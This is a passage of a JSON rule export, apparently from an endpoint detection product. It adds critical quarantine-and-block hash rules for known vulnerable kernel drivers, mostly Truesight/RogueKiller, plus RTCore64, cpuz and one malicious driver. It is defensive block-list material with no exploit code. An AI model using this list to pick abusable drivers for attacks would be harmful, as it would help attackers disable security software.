[https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e18d3f2-a41a-5420-9618-2bc4ebd756c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149915Z", + "creation_date": "2026-03-23T11:45:31.149918Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149923Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "538a437a907b471ae2727e9db9abc01322d18a5b35327fe578710f33b7dfae18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e1a8fb1-32e4-5c07-93dd-6fb2d76300e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485770Z", + "creation_date": "2026-03-23T11:45:31.485773Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485784Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e42e77ce4e8ccee8f135311ba69d2e3d7cba2212532f074ac4e284904ee298c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"9e3145dd-1266-5ff1-9e6b-7277f0c8198e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814776Z", + "creation_date": "2026-03-23T11:45:31.814779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86f2d62b48fcfe930c39b2831cbb74ae0059b5d80a661a4e0935404830d8b5ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e31a86b-23a5-5fd8-984a-a5e9464fc716", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460180Z", + "creation_date": "2026-03-23T11:45:30.460183Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.460191Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5fe5a6f88fbbc85be9efe81204eee11dff1a683b426019d330b1276a3b5424f4", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e3aa0e6-100b-5674-9158-b65d1f8f4ca7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817761Z", + "creation_date": "2026-03-23T11:45:31.817764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817773Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1cf9983c2e1b60ff30ed6536e9ad4c63bccddc70c33fc90817b325ac7e4956c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e4545b3-a949-59fa-b167-9b105591ca51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828807Z", + "creation_date": "2026-03-23T11:45:30.828809Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "efc49e1cfae6139fd3b9f17099e560afa0e25c28d3cd44e5873d0feddcde1fe6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e590472-e39c-596b-bb81-510d66022041", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145071Z", + "creation_date": "2026-03-23T11:45:31.145073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "39ae7a7a20366cb6b2e6cfec3476429249de837cfb0e1245237d31e4c4e87fc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e65a468-a620-5648-871b-283f75f99abe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828672Z", + "creation_date": "2026-03-23T11:45:31.828674Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828679Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc424dc1d8b745d6b961f5c616f641b01edfa06ff1c8c185067b2d7ca9285137", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e678389-face-5180-accf-a05378066430", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489602Z", + "creation_date": "2026-03-23T11:45:31.489605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c74b01e02e2a18c353bb67808efbfa766e54f441bf7dbb91bad490e8b58a72d9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e722cbb-068d-5332-9978-3d03d2763f51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818807Z", + "creation_date": "2026-03-23T11:45:30.818809Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2418301336cd89b7e3bda2f68bc1aa63b8ea9a75da7a3b40a9ee0a9058789f63", + "comment": "Vulnerable Kernel Driver (aka 
kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e79d08b-fd5f-5223-915d-a88da7a576b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151362Z", + "creation_date": "2026-03-23T11:45:31.151365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151373Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b80b00d7c1178f9e8568daf72095b3731f02a655872837a98f3afae066934d74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e886ee4-27d5-54c6-aea8-4a0020c1ff72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.493383Z", + "creation_date": "2026-03-23T11:45:31.493385Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493390Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a01d3842dbeed32beb3ba1b0b5578d4a26a85336f9a75497b4329e6685ea8577", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e9831e8-7780-5df4-a989-4a1fe7813edd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150125Z", + "creation_date": "2026-03-23T11:45:31.150127Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150132Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8face68c6d53a61e5bc75d981fc7639dd861859e8beb7180ad7eb0c12791a6cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9e9c34c0-155f-55c5-bd96-cc05d8b0f263", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829897Z", + "creation_date": "2026-03-23T11:45:30.829899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a678dd8c37435d5b606b41b6232b8a7232f981a1c2295ec4863649e362f8e7e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ea1e404-a6ef-5776-b0f6-d0d757c8c277", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143475Z", + "creation_date": "2026-03-23T11:45:31.143477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143482Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf1330ec9304e857d70135e29e91cf0b7926e41a9c34f2d1a798fcf46f573174", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ec2e2ed-3250-5706-92e9-a608917a39ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977898Z", + "creation_date": "2026-03-23T11:45:29.977901Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977906Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217", + "comment": "Malicious Kernel Driver (aka daxin_blank6.sys) [https://www.loldrivers.io/drivers/3d1439e9-9a7d-497a-8c6c-74513f825d6a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9eccebb1-ae20-556d-8367-1b093141198c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142255Z", + "creation_date": "2026-03-23T11:45:31.142257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142263Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f17fa26ccde612a01707f58fa640d520c53aa53631883ade129c675b51c4e0f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9edab224-c394-5d1d-a138-fc171d26521e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154129Z", + "creation_date": "2026-03-23T11:45:31.154131Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154136Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e65f7e35b7f76f2a6f1e467380f6b988313d78f80e129c566b0a227cdcb80f4c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ee02884-8464-5bc8-8f2d-f55ba9395af8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983721Z", + "creation_date": "2026-03-23T11:45:29.983723Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4", + "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv.sys) [https://www.loldrivers.io/drivers/b72f7335-6f27-42c5-85f5-ed7eb9016eac/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ee16c4c-00c3-5628-a2f9-ecff75172685", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473114Z", + "creation_date": "2026-03-23T11:45:31.473118Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473127Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47c4e9795cd672e4df7905d531ec7a435b7d6487eb3cd1af03cbd9338fda4b80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ee422db-5a0a-5212-bf95-d0b61158c11c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620935Z", + "creation_date": "2026-03-23T11:45:29.620937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620950Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6948480954137987a0be626c24cf594390960242cd75f094cd6aaa5c2e7a54fa", + "comment": "Phoenix Technologies Vulnerable Physmem 
drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ef80e90-28ce-5360-b276-7c91c5cebb42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827734Z", + "creation_date": "2026-03-23T11:45:30.827736Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827741Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e32ad2cc81d76e1fc4343565d192822d3c07a1666614ef9eed373d1a8718f47", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f1c7bad-adc5-5862-b9c3-6f644b7889c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488009Z", + 
"creation_date": "2026-03-23T11:45:31.488011Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ced544aec0b87127e0548af7825a40593152636f7cbbdcd714fbb9f6be1a835d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f2582b9-4dfb-5c8a-9304-dac83c6d4427", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473455Z", + "creation_date": "2026-03-23T11:45:30.473458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473467Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58cb5439e34be4ede6d93c463cb0433c99a100a1c06fca777eda751fd72c07bf", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9f3e64f7-cf44-5122-8b0e-6bbf7cece4e9", 
